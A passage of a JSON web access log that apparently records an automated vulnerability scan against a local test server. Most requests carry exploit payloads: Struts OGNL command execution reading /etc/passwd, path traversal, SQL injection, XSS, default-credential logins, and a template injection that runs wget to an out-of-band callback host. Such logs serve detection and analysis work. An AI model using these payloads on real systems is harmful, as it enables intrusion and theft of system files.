Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MFkEe8Ea3iAsZqPZ0NAPWMqu.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%60297MFj8jYfnp02OW19ReIYAU9Xa%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debug_toolbar/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c9v8gc8smpv8b0ng0t00e4s6s6gp6yatg.oast.online%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://c9v8gc8smpv8b0ng0t00qmsaqd5a7ia9d.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 